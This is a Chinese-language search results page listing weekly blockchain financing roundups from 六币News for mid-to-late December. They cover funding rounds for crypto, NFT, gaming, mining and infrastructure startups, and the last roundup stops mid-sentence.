找到
1087
篇与
heyuan
相关的结果
-
融资周报 | 公开融资事件24起;Line Next宣布从Crescendo Equity Partners及其财团获得1.4亿美元投资 本期看点据 六币News 不完全统计,上周(12.11-12.17)全球区块链有24起投融资事件,资金总规模超3.27亿美元,与前一周相比融资数量与资金规模均有所增加,概览如下:DeFi赛道公布了3起投融资事件:DeFi平台Curvance在其种子轮融资中筹集了360万美元; 铭文方面公布了2起投融资事件,其中OrdFi 生态协议Tap Protocol完成由 Sora Ventures 领投的 420 万美元融资; NFT和元宇宙领域公布了3起投融资事件:Line旗下NFT子公司Line Next从私募股权基金运营商 Crescendo Equity Partners 及其财团获得1.4亿美元投资; 链游赛道公布2起投融资事件,其中阿联酋链游工作室 Farcana 已从Animoca Brands、Polygon Ventures、Fenbushi Capital 等投资者那里筹集到1000万美元的种子轮资金; 基础设施与工具赛道公布了5起融资,其中Web3身份验证初创公司Dynamic完成1350万美元融资,a16z等领投; 其他Web3/加密相关项目方面公布了6起融资,其中比特币和现金返利平台Lolli完成800万美元B轮融资,BITKRAFT Ventures领投; 中心化金融领域公布3起投融资事件,其中数字资产交易平台GFO-X完成3000万美元B轮融资,M&G Investments领投 DeFi银行稳定币技术提供商GUGroup完成290万美元融资,日本的B Dash Ventures领投专注于银行稳定币技术的供应商 GUGroup 近日成功筹集了4.2亿日元(约合290万美元)的资金,主要支持者是日本的 B Dash Ventures,该公司还向海外投资者出售代币。该公司推广的Japan Open Chain是一个兼容以太坊的公共区块链,由包括索尼子公司Corgear、NTT Docomo、电通和福冈金融集团的数字银行Minna no Bank在内的企业运营验证节点。GuGroup 的子公司之一是稳定币发行解决方案 GUCoin Studio。此外,NTT Docomo对Japan Open Chain的参与尤为重要,因为它最近获得了日本最大加密货币交易所Coincheck的所有者Monex Securities 49%的股权。这一动作与其他主要加密货币交易所与特定稳定币的关联相似,如Binance与Binance USD、Coinbase与USDC以及Bitfinex与Tether。DeFi衍生品平台EthosX完成180万美元融资去中心化衍生品交易平台 EthosX 宣布完成 180 万美元新一轮融资,投资方包括 Y Combinator、Franklin Templeton、Ascensive Assets、Emurgo Ventures、Stacker VC、Sudo Research、Token Metrics Ventures、Cogitent Ventures、Asymmetry VC、Upsparks VC 等。EthosX 由前摩根大通全球衍生品清算业务副总裁 Deepanshu 于 2022 年创立,是Binance Labs 第六季 MVB 加速器计划的入选团队,主要提供金融衍生品的自动化和非托管清算和结算服务。其即将推出的产品为 SWITC。BTC生态稳定币协议bitSmiley完成首轮融资,OKX Ventures和ABCDE联合领投BTC生态稳定币协议bitSmiley宣布完成首轮融资,由OKX Ventures、ABCDE联合领投,具体金额未披露。据悉,该协议可让用户在BTC网络超额抵押原生BTC铸造稳定币bitUSD。同时,bitSmiley还囊括了借贷及衍生品协议,旨在为比特币提供一个全新的金融生态系统。此前,bitSmiley入选了今年11月由ABCDE和OKX Ventures联合举办的BTC黑客松的优质项目。铭文OrdFi生态协议Tap Protocol完成420万美元融资,Sora Ventures领投OrdFi 生态协议 Tap Protocol 已完成由 Sora Ventures 领投的 420 万美元融资。其他投资者包括 Cypher Capital、Rw3、Oak Grove Capital、Perock Capital、Kosmos Ventures、New Tribe Capital、Cogitent Ventures、Compute Ventures 和 MSA Novo,以及天使投资人 Animoca Brands 和 Quantstamp高管。Tap Protocol 提供一系列功能,包括 Ordinals 的碎片化以及在 Ordinals 上实现去中心化金融应用程序。比特币 Ordinals 借贷解决方案Liquidium完成125万美元Pre-Seed轮融资,Sora Ventures等参投比特币 Ordinals 借贷解决方案Liquidium完成125万美元Pre-Seed轮融资,Bitcoin Frontier Fund、Side Door Ventures、Actai Ventures、Sora Ventures、Spicy Capital、UTXO Management等参投。Liquidium 是一种专门在比特币区块链上运行的 P2P 借贷协议,其创新的解决方案使用户使用原生序数铭文作为抵押品借出和借入原生比特币,从而消除了对中介机构或托管人的需求。NFTLine Next宣布从Crescendo Equity Partners及其财团获得1.4亿美元投资Line旗下NFT子公司Line Next 宣布从私募股权基金运营商 Crescendo Equity Partners 及其财团获得1.4亿美元投资,是今年亚洲区块链和Web3领域最大规模的投资。该公司计划利用这笔投资推动Web3的普及,扩展全球平台业务,并开发新服务。其中包括明年1月将推出的全球NFT平台DOSI,以及基于人工智能技术的社交应用和Web3游戏。NFT初创公司Metagood完成500万美元种子轮融资NFT初创公司Metagood完成500万美元种子轮融资,Sora Ventures领投,ACTAI Ventures、Bitcoin Frontier Fund、Bitcoin Magazine Fund、London Real Ventures和Peach.xyz参投,新资金将资助其Osura的新技术和产品开发及营销,并促进与艺术家的合作。据悉,Metagood是一家推出创新OnChainMonkey NFT和Osura市场的区块链技术和数字资产公司。此前去年12月消息,Metagood完成500万美元Pre种子轮融资,Animoca Brands等参投。NFT永续合约交易平台nftperp完成300万美元A轮融资,1kx领投NFT永续合约交易平台nftperp宣布完成总额为300万美元的A轮融资, 1kx领投,Maven 11和Mechanism Capital等投资者,以及Spencer Ventures的Spencer和Gmoney、MetaStreet的 David Choi、Upshot的Nick Emmons、NFTfi的Jonathan Gabler等天使投资人参投。此外,nftperp还宣布,其v2 版本即将推出,承诺将带来更多创新功能和增强功能。据悉,nftperp是一项NFT永续协议,系为所有Web3用户创建的开源DeFi协议。其目标是创建一个全面的产品生态系统,推动NFT的金融化,其核心产品是去中心化的永续期货交易所。链游链游工作室Farcana完成1000万美元的种子轮融资,Polygon Ventures等参投总部位于阿联酋的链游工作室 Farcana 已从Animoca Brands、Polygon Ventures、Fenbushi Capital 等投资者那里筹集到1000万美元的种子轮资金,以进一步开发其第三人称多人射击游戏 Farcana。Rarestone Capital、MMPro Trust、Unpopular Ventures、Kapo Capital、Emchain、Hasu Capital 和 Dravus Investment 也参与了这轮融资。Farcana 在游戏风格上与暴雪公司的《守望先锋》有一定相似之处,但地图较小、有墙,并且游戏模式让人联想到拳头游戏公司的《Valorant》。Farcana 的故事背景设定在一个近未来的世界,人类已离开地球前往火星,并在那里发现了一种赋予超能力的物质 Axelar。Farcana 计划提供像是玩家赚取比特币的比赛功能,奖励排名前10%的玩家。游戏中的物品都将以 NFT 的形式存在,Farcana 将使用 FAR 代币进行所有交易。Web3娱乐平台Matr1x完成来自OKX Ventures的新一轮融资Web3娱乐平台Matr1x在X平台上表示完成来自OKX Ventures的新一轮融资。此前消息,Web3娱乐平台Matr1x完成1000万美元A轮融资,Hana Financial Investment、Hashkey Capital、Amber Group和SevenX Ventures参投。基础设施&工具数字资产风险基础设施初创公司Andalusia Labs以超10亿美元估值完成4800万美元A轮融资专注于数字资产风险基础设施的Andalusia Labs(原名RiskHarbor)以超10亿美元估值完成4800万美元A轮融资,Lightspeed Venture partners领投,Mubadala Capital、Pantera Capital、Framework Ventures、Bain Capital Ventures和Digital Currency Group等参投。在获得新一轮融资的同时,Andalusia Labs还在阿布扎比开设了全球总部。到目前为止,该公司共筹集了约5100万美元。据悉,这家初创公司有三个主要的数字资产技术解决方案:Layer 2区块链Karak、加密风险管理市场Subsea、以安全为中心的机构平台Watchtower。所有这些都旨在通过各自的利基为机构、开发商和消费者提供数字资产支持。Web3身份验证初创公司Dynamic完成1350万美元融资,a16z等领投Web3身份验证初创公司Dynamic完成1350万美元融资,a16z和Founders Fund领投。这轮融资建立在2022年由a16z主导的750美元种子轮融资的基础上。这笔新资金的大部分将用于招聘工程师,其中一些也将用于营销。这家成立两年的公司由麻省理工学院毕业生Itai Turbahn和Yoni Goldberg创立,他们现在分别是首席执行官和首席技术官,为加密和非加密公司提供技术,以创建由数字钱包支持的无缝登录体验。Avalanche生态Rollup网络SEQ开发团队NodeKit完成120万美元Pre-Seed轮融资基于Avalanche的网络SEQ开发团队NodeKit完成120万美元Pre-Seed轮融资,Borderless Capital领投,Avalanche Blizzard Fund、Polygon Ventures和Wormhole Cross-Chain Ecosystem Fund参投。NodeKit正在构建SEQ,这是一个共享排序器的L1网络,将帮助rollup chains推出并去中心化其交易排序。SEQ将作为一个独立的区块链或子网在Avalanche生态系统中运行。SEQ的设计还将支持各种数据可用性层,例如Celestia。SEQ的测试网计划于2024年启动,随后发布主网。区块链安全公司Hackless完成120万美元私募轮融资区块链安全解决方案Hackless宣布完成120万美元私募轮融资,DAO Maker、Insignius Capital、Cosima Capital、DeltaHub Capital、Factial和Halvings Capital等参投。据悉,Hackless主要在数字资产和DeFi领域提供区块链安全服务,新资金将用于推动旗下安全解决方案Wallet Rescue和Sentinel的快速开发。以太坊Layer 2项目Enphyr完成100万美元种子轮融资以太坊Layer 2项目Enphyr宣布以1000万美元估值完成100万美元种子轮融资,Waveslab Ventures领投,若干个人投资者参投。新资金将用来扩展团队及合作伙伴、增强工程计划以加快其路线图。据介绍,Enphyr主要帮助项目利用以太坊的安全性并通过其数据隐私、数据代币化和区块链支持的KYC验证服务来构建下一代Web3应用。去中心化物理基础设施网络Hivello完成100万美元Pre-Seed轮融资去中心化物理基础设施网络(DePIN) Hivello宣布完成100万美元Pre-Seed轮融资,NGC、Blockchain Founders Fund、Side Door Ventures、IDG、Bing Ventures、MEXC Exchange、XT.com Exchange、Genesis Block和NxGen等参投。据悉,DePIN是指利用区块链技术和代币激励来构建物理基础设施网络,这样其他项目就不需要承担购买和运行自己的设备的成本。根据新闻稿, Hivello准备在今年圣诞节推出其技术,预计未来12个月内将集成100个DePIN。其他加密矿业:嘉楠科技拟通过优先股融资1.25亿美元,已筹集2500万美元据比特币矿机制造商嘉楠科技周三向SEC提交的6-K表格文件(注册地不在美国的外国公司披露特定财务信息),该公司于11月27日签订了《证券购买协议》,将通过向一家机构投资者(名称未披露)发行A系列可转换优先股筹集至多1.25亿美元的资金(最多125000股,每股优先价格1000美元),所得款项净额将用于研发、扩大生产规模以及其他一般公司用途。该公司已完成第一期优先股融资,募集资金总额为2500万美元。矿企Bit Origin为怀俄明州的新挖矿设施融资674万美元比特币挖矿公司 Bit Origin 宣布已获得 674 万美元的投资,将在怀俄明州建造一座新的挖矿设施。该数据中心将是一个新的 25 兆瓦 (MW) 站点,旨在容纳 4,480 至 8,400 名比特币矿工。Web3应用:比特币和现金返利平台Lolli完成800万美元B轮融资比特币和现金返利平台Lolli完成800万美元B轮融资,BITKRAFT Ventures领投,Sfermion、Ulta Beauty的Prisma Ventures、Hypersphere Ventures、ZebPay的首席执行官Rahul Pagidipati、2 Punks Capital、MZ Web3 Fund、Seven Seven Six、Founders Fund的Pathfinder Ventures、Bain Capital Ventures、Serena Williams 的 Serena Ventures、Logan Paul和MrBeast的Night Media等参投。新资金将用于向交易所、新银行、银行、支付公司和浏览器等企业合作伙伴推出Lolli的奖励计划。到目前为止,Lolli已经筹集了超过2800万美元。据悉,自2018年推出以来,Lolli应用目前与2.5万多家商店合作。该公司的奖励计划是,当用户在网上或亲自到餐馆和商店购物时,可以获得比特币或现金返还。Lolli自成立以来已提供了超过1000万美元的比特币奖励以及现金返还奖励。去年,该公司推出了Card boost,允许用户在购物时将比特币奖励添加到借记卡或信用卡中。Web3学习和赚钱平台Intract完成300万美元融资Web3学习和赚钱平台Intract宣布完成300万美元融资,Alpha Wave Global、BITKRAFT Ventures和Gumi Cryptos领投,Polygon Ventures、Tokentus、MoonPay、Web3 Studios等参投,这笔资金将用于将团队规模扩大一倍,并将平台扩展到十亿用户。Intract拥有超200万活跃用户,帮助用户探索Web3中各个垂直领域的新项目。Intract用户通过称为“任务”的活动了解此类项目,并被激励完成某些任务以获得奖励。通过Intract任务,项目现在可以增加新用户并建立忠诚度。Intract计划于2024年推出其学院,这是一种专为探索web3的web2用户设计的策划学习体验,以及Intract内部经济,用户可以通过未来去中心化的网络与同行互动。Web3社交平台Seam Social完成250万美元的种子轮融资,由1kx领投由社区开发的Web3社交媒体平台Seam Social宣布完成了250万美元的种子轮融资。这轮融资由1kx领投,Seed Club Ventures、Sfermion、F7 Ventures、Social Graph Ventures以及其他关键天使投资者参与。Seam Social成立于2022年,由前Meta工程师Nick Confrey创立,该平台允许用户创建自定义个人资料、添加亲密朋友并分享生活更新。Seam通过引入小程序,使用户能够通过拖放块(如GIF、音乐和嵌入式网站)来创建他们的个人资料。所有小程序都是开源软件,允许任何人学习编码和混合示例,然后向朋友和全世界发布新的小程序。Aki Network完成A轮融资,估值5000万美元Aki Network宣布完成A轮融资,MARBLEX和一家未披露名称的日本风投领投,Puzzle Ventures和多名日本企业家参投,投后估值达5000万美元。Aki Network是一个专注于KOL影响力市场的数据导向Web3项目,其正在计划进行多轮AKI代币空投。中心化金融数字资产交易平台GFO-X完成3000万美元B轮融资,M&G Investments领投数字资产交易平台 Global Futures and Options (GFO-X) 周一表示,英国 M&G Investments (MNG.L)在推出前已领投了 3000 万美元的第二轮融资。M&G Investments 是 M&G plc 旗下价值 3,320 亿英镑的资产管理部门,M&G 将加入 GFO-X Holdings 董事会。GFO-X 为需要受监管的机构级数字资产衍生品(包括比特币指数期货和期权)交易场所的大型全球机构参与者提供服务。GFO-X获得了英国金融行为监管局许可,全球机构投资者可以交易数字资产期货和期权,这些期货和期权将在伦敦证券交易所集团的巴黎清算机构 LCH SA 进行清算。面向金融机构的加密交易平台Rulematch已融资1400万美元,并正在进行下一轮融资前瑞士信贷私人银行高管David Riegelnig创立的苏黎世初创公司Rulematch推出了一个面向银行和证券公司的加密货币交易平台。该公司仅为金融机构提供服务,目前已开始交易比特币和以太坊,并向欧盟大部分地区、英国和新加坡的客户开放。Rulematch获得了包括以太坊联合创始人Joseph Lubin创立的ConsenSys Mesh、Flow Traders和FiveT Fintech等投资者的1400万美元投资,并正在进行下一轮融资。Rulematch目前的初始客户包括七家银行和证券公司,如Banco Bilbao Vizcaya Argentaria和DLT Finance。其指定的市场做市商包括Flow Traders和Bankhaus Scheich Wertpapierspezialist。该公司使用由Nasdaq Inc.开发的软件进行交易匹配、风险监控和潜在市场滥用检测。数字银行Pave Bank完成520万美元融资,468 Capital领投新加坡初创银行Pave Bank宣布完成了520万美元融资,此轮融资由468 Capital牵头,参与投资方包括Quona Capital、Financial Technology Partners、BR Capital、w3.fund、Daedalus及多位天使投资者。Pave Bank由首席执行官Salim Dhanani领导,刚获得乔治亚州监管当局颁发的首个银行许可证,并计划明年第一季度开始接纳客户。Pave Bank致力于利用区块链技术改善传统银行服务,尤其是在国际支付领域。Dhanani表示,区块链的运用及银行和金融服务的未来方向是他们关注的重点。他认为,Pave Bank的“可编程货币”将能够解决跨市场交易中的信任问题。 -
融资周报 | 公开融资事件22起;比特币矿商Arkon Energy完成1.1亿美元融资,Bluesky Capital Management领投 本期看点据 六币News 不完全统计,上周(12.18-12.24)全球区块链有22起投融资事件,资金总规模超3.1亿美元,与前一周相比融资数量与资金规模均有所增加,概览如下:DeFi、NFT和元宇宙赛道未公布投融资事件; 链游赛道公布2起投融资事件,其中韩国游戏巨头Nexon旗下NFT游戏项目MapleStory Universe宣布获得1亿美元投资,投资方未披露; 基础设施与工具赛道公布了7起融资,其中Web3 质押协议 Web3mine 完成 600 万美元种子轮融资,1kx 领投; 其他Web3/加密相关项目方面公布了11起融资,其中艺术家直连粉丝平台Medallion宣布完成1370万美元A轮融资,Dragonfly和Lightspeed Faction共同领投; 中心化金融领域公布2起投融资事件,其中银行即服务平台Fiat Republic完成700万美元融资,Kraken Ventures参投 链游Nexon旗下NFT游戏项目MapleStory Universe宣布获得1亿美元投资韩国游戏巨头Nexon旗下NFT游戏项目MapleStory Universe在X平台宣布于近日获得1亿美元投资,投资方未披露。据悉,MapleStory(冒险岛)于2003年在韩国首次亮相,此后在全球其他几个国家发行。在游戏中,玩家创建自己的角色并开始任务,与怪物战斗,并在虚拟世界中与其他玩家互动。该游戏具有各种不同的职业可供选择,每个职业都有自己独特的技能。此前今年3月消息,Nexon宣布在Polygon上推出NFT游戏MapleStory Universe。DMM Group旗下Web3子公司DM2C Studio完成230万美元融资,Galaxy Interactive领投日本娱乐业巨头DMM Group旗下Web3子公司DM2C Studio宣布通过发行代币可转换债券完成230万美元融资,Galaxy Interactive领投,Shima Capital、Bitfinex、MARBLEX、SQUARE ENIX HOLDINGS CO., LTD.、Planetarium Labs、Mask Netork、DeFimans Co., Ltd.参投。据悉,DM2C Studio成立于2023年1月,其目标是开发DMM的Web3业务,包括区块链游戏和NFT项目。今年6月,DM2C Studio推出了web3项目“Seamoon Protocol”,利用其代币在数字空间中提供新的娱乐体验。该项目计划在Oasys Layer2上推出其专有区块链“DM2 Verse”,推出其“DM2P”代币,并提供区块链游戏等举措。基础设施&工具Web3基础设施Web3mine完成600万美元种子轮融资,1kx领投为开放访问存储和计算网络提供支持的 web3 质押协议 Web3mine 完成 600 万美元种子轮融资,1kx 领投,Protocol Labs、PL Ventures等参投。web3mine 旨在让世界能够集体协调资本和硬件,为每个人构建开放、高性能和弹性的计算基础设施。Web3初创公司Wynd Network完成350万美元种子轮融资,Polychain Capital等领投Web3初创公司Wynd Network宣布完成350万美元种子轮融资,Polychain Capital和Tribe Capital领投。Bitscale、Big Brain、Advisors Anonymous、Typhon V和Mozaik等参投。这笔资金将用于增强其首款产品Grass的技术基础设施、扩大其节点网络并完善其数据验证流程。据悉,Wynd Network是一家帮助用户将未使用的互联网带宽货币化的初创公司,其首个产品Grass是一个去中心化的网页抓取网络,旨在帮助公司和非营利组织训练人工智能。目前,Grass允许用户通过网络浏览器扩展提供未使用的互联网带宽来赚取积分,这些积分将在产品测试阶段结束时“追溯转换为网络所有权”。去中心化网络formless完成超220万美元Pre-Seed轮融资,a16z crypto参投去中心化网络formless宣布完成超220万美元的Pre-Seed轮融资,这笔资金将用于继续推进SHARE协议,并支持多人数字经济下一代产品的开发。a16z crypto、Contango Digital Assets、Sandeep Nailwal、dharmesh、Beacon Accelerator、Zypsy、MH Ventures和Knights Capital等参投。Web3云计算平台“4EVERLAND”完成200万美元融资,Arweave等参投Web3云计算平台“4EVERLAND”完成200万美元融资,本轮融资由Arweave, WaterDrip Capital, Bing Ventures, Forward Research, Web3.com Ventrues, Arweave SCP Ventures, GTS Ventures, Hillstone等机构参投。4EVERLAND是一个由区块链技术驱动的Web3.0基础设施,集成各类DePIN协议,为开发者提供便捷、高效、低成本的存储、网络和计算能力。它致力于帮助开发者从Web2.0平滑迁移到Web3.0,并构建一个对用户友好的Web3.0云计算平台。Algorand生态成员推出分叉项目“Voi”并完成种子轮融资,Arrington Capital参投Algorand权益证明区块链生态系统的资深成员已联合起来推出了开源新版本,称为“Voi”,目前已启动测试网,领导这个新项目的是Chris Swenor,他是区块链开发平台Reach和Algorand去中心化交易所 (DEX)HumbleSwap的联合创始人。据悉,与以太坊EthPoW分叉有所不同,Voi将仅分叉Algorand代码,并不会分叉Algorand链状态,Voi将推出自己的代币,但该代币与ALGO代币所有权不会有任何关联。此外,Voi还宣布已完成种子轮融资,Algorand早期投资者Arrington Capital、Sonic Boom Ventures参投,具体金额暂未披露。蓝港互动旗下LK Venture对比特币金融层解决方案ALEX Labs进行战略投资香港上市公司蓝港互动旗下LK Venture在X平台宣布,其近日通过比特币网络生态投资管理基金BTC NEXT,对比特币金融层解决方案ALEX Labs进行战略性投资。Qredo获得10T Holdings领投的债务融资以维持运营,原领导层发生更迭在加密基础设施初创公司Qredo A 轮融资的主要投资者 10T Holdings 牵头的一项改革中,Qredo 联合创始人兼首席执行官 Anthony Foy 被要求离开。该公司产生了新的首席执行官、首席运营官和董事会。64 岁的 Foy 已被 Qredo 的首席财务官、48 岁的邓肯·佩恩-雪莱 (Duncan Payne-Shelley) 接替。Payne-Shelley 的 LinkedIn 个人资料也已更新,显示他现在担任 Qredo 的首席执行官和首席财务官。除了 Foy 之外,Qredo 的首席运营官 Josh Goodbody 也不再为该公司工作,并由公司首席人力官 Becky Mifsud 接任。其他加密矿业:澳大利亚比特币矿商Arkon Energy完成1.1亿美元融资,Bluesky Capital Management领投澳大利亚比特币矿商Arkon Energy完成1.1亿美元融资,Bluesky Capital Management领投,Kestrel 0x1、 Nural Capital等参投。其中8000万美元将用于在美国扩张,另外3000万美元用于挪威30MW数据中心的人工智能云服务项目。Arkon Energy成立于2019年,其于2022年11月完成2800万美元融资,Blue Sky Capital领投。随后该公司又于今年6月完成2600万美元融资。比特币矿企Unblock Global完成1500万美元融资阿根廷比特币矿企Unblock Global完成1500万美元融资,参与该合资企业的主要能源公司包括Crusoe energy、Pampa Energia和Petrocuyo,这些公司参与了由Unblock Global的分支机构Unblock Computos管理的融资。该轮融资将用于世界上第二大页岩气储量Vaca Muerta的天然气。据悉,Unblock Global旨在利用石油开采过程中产生的废弃天然气为比特币挖矿的高级计算挖矿操作提供动力。比特币矿企Stronghold完成1500万美元融资股权融资上市比特币矿企Stronghold Digital Mining宣布与一家机构投资者签订了价值1500万美元的股权购买协议,Stronghold表示将该笔资金用于扩大其采矿设备数量并推动其碳捕获计划发展。此次注资是通过以平均每股6.71美元的价格出售230万股A类股票来实现的。今年早些时候,该公司与嘉楠耘智的Cantaloupe Digital建立了合作伙伴关系,以增强其算力。此外,Stronghold还提供了Panther Creek采矿设施的最新情况,显示该站点在2023年11月20日至12月7日期间以60%的容量运行。消费应用:Web3粉丝平台Medallion完成1370万美元A轮融资,Dragonfly和Lightspeed Faction共同领投艺术家直连粉丝平台Medallion宣布完成1370万美元A轮融资,由Dragonfly和Lightspeed Faction共同领投。该平台致力于弥补音乐产业中艺术家与粉丝在线关系管理的空白,提供独家数字收藏品销售和专属内容分享,以增强艺术家与粉丝的连接。目前已有20名艺术家使用Medallion构建粉丝社区,公司计划于2024年扩展至更多艺术家,预计2025年或更晚对更广泛艺术家开放。Medallion 建立在区块链上,用户可以使用电子邮件或钱包提供商(Rainbow、Coinbase 和 WalletConnect)登录。此轮融资的其他投资者包括 Coinbase Ventures、Infinite Capital、J17、The Chernin Group、Third Prime 和 Zeal Capital,以及音乐行业投资者 Bill Silva Entertainment、Black Squirrel、Foundations Artist Management、Method 和 TAG Music。Medallion 还得到了顶级艺术家 Jungle、Mt. Joy、Guy Lawrence (Disclosure) 和 Tiga 的支持。迄今为止,该公司已筹集 2200 万美元。去中心化患者网络Humanscape完成约1534万美元C轮延期融资基于区块链的去中心化患者网络Humanscape完成200亿韩元(约1534万美元)C轮延期融资,韩国开发银行、韩亚证券和韩亚风险投资公司参投。加上此轮融资完成,Humanscape在C轮融资的总金额达到400亿韩元(约3069万美元),累计融资额增至750亿韩元(约合5754万美元)。据悉,Humanscape是一个基于区块链的去中心化患者网络。Humanscape可以通过基于社区活动的智力和情感互动,为患者克服疾病提供帮助。平台上由患者生成的健康数据 PGHD主导行使权完全归属于患者。Web3税务服务公司Tres Finance完成1100万美元A轮融资专注于为Web3公司提供税务和其他金融服务的Tres Finance在A轮融资中筹集了1100万美元。此轮融资由Lightspeed的新基金Faction领投,New Form、Boldstart Ventures、Cyber Fund和Ambush Capital等也参与了投资。这次融资后使得Tres的总融资额达到了1860万美元。Tres提供会计、审计、报告和其他金融服务,支持超过 100 个第 1 层和第 2 层区块链,包括比特币、以太坊、Solana、Avalanche,并计划在未来添加更多支持的区块链。Tres计划利用这笔资金推动公司的发展,目标是在一年内将其在美国、欧盟和亚太区的客户基础扩大300%。Web3增长营销服务公司Addressable完成600万美元融资,Bitkraft Ventures领投Web3增长营销服务公司Addressable宣布已完成600万美元新一轮融资,Bitkraft Ventures领投,战略投资机构Karatage以及 Viola Ventures、Fabric Ventures、Mensch Capital Partners、North Island Ventures等参投。据悉该公司曾在今年一月完成750万美元种子轮融资,截至目前其融资总金额达到1350万美元。Addressable主要帮助Web3公司和项目处理付费广告活动,其业务覆盖包括X(原Twitter)、Unity、Pubmatic和Magnite等广告网络,并且支持与Twitter Pixel、DSP Pixel、Mixpanel和Google Analytics无缝集成以追踪网站转换、钱包连接和链上指标等,新资金将用于拓展更多广告网络和区块链。TON生态Launchpad平台TonUP完成新一轮融资,Antalpha等参投TON生态Launchpad平台TonUP在X平台宣传完成新一轮融资,本轮融资由Antalpha、MEXC Venture、Waterdrip Capital、New Tribe Capital、nxgen capital、MixMarvel DAO Venture、y2z Venture及行业个人投资者参投,所筹资金将用于支持产品研发和多方市场的扩展。此前8月份消息,TON生态Launchpad平台TonUP宣布获得TONcoin.Fund的六位数投资。积分整合平台Assemble Protocol宣布获得DWF Labs战略投资基于区块链的积分整合平台Assemble Protocol宣布获得DWF Labs战略投资,将使其能够利用DWF Labs的Web3生态系统基金的资源,为Assemble Protocol的积分交换、市场和数据基础设施等关键功能的持续开发提供重要资金。具体投资金额未披露。Tether宣布投资Academy of Digital Industries稳定币发行商Tether宣布已向Academy of Digital Industries(数字产业研究学院)的A轮投资进行了一笔金额未披露的投资,这项投资将持续进行,并提供长期财政援助,以建立和推动教育新领域,提供广泛的数字和传统课程。据悉,Academy of Digital Industries是一家位于佐治亚州的教育平台,成立于2018年6月,其提供广泛的数字化课程培训,并拥有近2万名毕业生,开设近1900个课程。学院在其学习课程中提供的主题包括尖端设计、工程/编程、营销和商业相关课程微软认证、财务建模、图形设计、信息技术、UI/UX设计、编程、SEO优化等。通过与Tether合作,学院现在将执行更广泛的全球战略,包括其所有教育产品比特币、稳定币、点对点技术和人工智能。DID市场聚合器GoDID以3000万美元估值完成新一轮融资,NGC领投DID市场聚合器GoDID宣布以3000万美元估值完成新一轮融资,NGC领投,融资金额未披露。据悉,GoDID的功能包括各类DID的批量搜索、注册、交易和管理。中心化金融银行即服务平台Fiat Republic完成700万美元融资,Kraken Ventures参投总部位于伦敦的银行即服务平台Fiat Republic近日完成了700万美元的种子扩展轮融资。此轮融资首次吸引了Kraken Ventures(支持Shield和Rally)、Fabric Ventures、Arca、Inovo.vc和Pretiosum Ventures等新投资者,以及Speedinvest、Credo Ventures和Seedcamp等现有投资者的参与。该资金将用于推动公司的增长和扩张,主要举措包括战略性招聘、加强银行合作伙伴关系,以及向新领域扩展。此外,该公司还计划改善加密货币平台的银行和支付服务的可访问性。这是继去年筹集到250万美元资金之后的又一次融资。香港数字资产保险公司OneDegree获Dubai Insurance战略投资香港数字资产保险公司OneDegree获Dubai Insurance战略投资,投资金额未披露。OneDegree联合创始人兼首席执行官Alvin Kwock表示,此次投资是6月份5500万美元B轮融资的基础上的投资,这使得OneDegree的融资总额接近1亿美元。注资后,OneDegree将开始向正在迪拜申请开展加密相关业务许可证的公司提供数字资产保险产品。Kwock预计,到2024年底,其数字资产保险服务的客户数量将激增至100多家。他还估计,数字资产保险业务明年将占OneDegree总业务的一半左右,高于目前的30%。风投机构韩国游戏公司Wemade与新加坡Whampoa Digital共同推出1亿美元的Web3基金韩国游戏公司Wemade与新加坡Whampoa Digital建立了战略伙伴关系,共同推出价值1亿美元的Wemade Web3基金。Whampoa Digital是新加坡Whampoa集团的技术投资部门,该集团是亚洲一些知名家族拥有的私人投资公司。作为此次合作的一部分,Whampoa Digital将成为Wemade在迪拜国际金融中心(DIFC)创新中心的WEMIX PLAY中心及Wemade Web3基金的生态系统合作伙伴。双方将在Web3行业内进行相互的项目推荐和共同投资有前途的项目。Wemade运营着全球领先的Web3游戏平台WEMIX PLAY,并在游戏投资领域拥有卓越的记录。Trustless Labs推出1000万美元的比特币生态系统第一阶段基金Trustless Labs宣布推出价值1000万美元的比特币生态系统第一阶段基金。这是一个专门致力于促进比特币生态系统内创新和发展的重大孵化器计划。以研究驱动的Web3孵化器Trustless Labs旨在成为推动区块链和技术领域积极创新的催化剂。此基金将专注于支持BRC20、Atomicals、inscriptions和Runes等项目,进一步加强和丰富比特币网络的应用和功能。
-
融资周报 | 公开融资事件7起;去中心化存储平台CESS完成约800万美元融资,DWF Labs等参投 本期看点据 六币News 不完全统计,上周(12.25-12.31)全球区块链有7起投融资事件,资金总规模超4300万美元,与前一周相比融资数量与资金规模均大幅减少,概览如下:DeFi、CeFi、NFT及元宇宙赛道未公布投融资事件; 链游赛道公布3起投融资事件,其中Web3+AI游戏平台Sleepless AI完成由Folius Ventures领投的新一轮融资,具体金额未披露; 基础设施与工具赛道公布了3起融资,其中去中心化存储平台CESS完成约800万美元融资,HTX Ventures、DWF Labs等参投; 其他Web3/加密相关项目方面公布了1起融资:加密矿企HIVE Digital完成约2178万美元私募融资 链游Web3+AI游戏平台Sleepless AI完成由Folius Ventures领投的新一轮融资Web3+AI游戏平台Sleepless AI宣布完成由Folius Ventures领投的新一轮融资,具体金额未披露。根据其介绍,Sleepless AI是Binance MVB V加速器的获胜者,此前已完成Binance Labs和Foresight Ventures的投资。比特币生态链游Ordz Games宣布完成种子轮融资比特币生态链游Ordz Games宣布完成种子轮融资,Waterdrip Capital、Unisat、Satoshi Lab、CoinSummer、Sora Ventures等参投,融资金额暂未披露。据悉,Ordz Games于3月22日上线,是第一个将复古游戏代码刻到聪上并通过赛季奖励用户BRC-20代币的Gamefi项目。ORDZ GAMES首款游戏是坦克大战,项目方还陆续上了类似「羊了个羊」、飞船等一系列小游戏。团队日前公布将BRC-20代币名称由$OG$更改为ORDG,并将成为ALEX多链发射平台的首个IDO项目。Web3跨链游戏生态Portal完成新一轮融资Web3跨链游戏生态Portal已完成新一轮战略融资,具体金额暂未披露,苏富比副总裁兼数字艺术和NFT主管Michael Bouhanna、MonnPay联合创始人Max Crown、9GAG CEO @9gagceo、Pixelmon CEO GiulioX、Parallel联合创始人Kalos等参投。基础设施&工具去中心化存储平台CESS完成约800万美元融资,HTX Ventures、DWF Labs等参投去中心化存储平台Cumulus Encrypted Storage System (CESS)从13家风险资本公司筹集了约800万美元。公告称,HTX Ventures、Infinity Ventures Crypto、DWF Labs、Mentha Partners、Vespertine Capital、Web3 Foundation、Singchain Investment、7 O'Clock Capital、SolrDAO、FishDAO、OneBlock+、Winkrypto 和 Polkadot 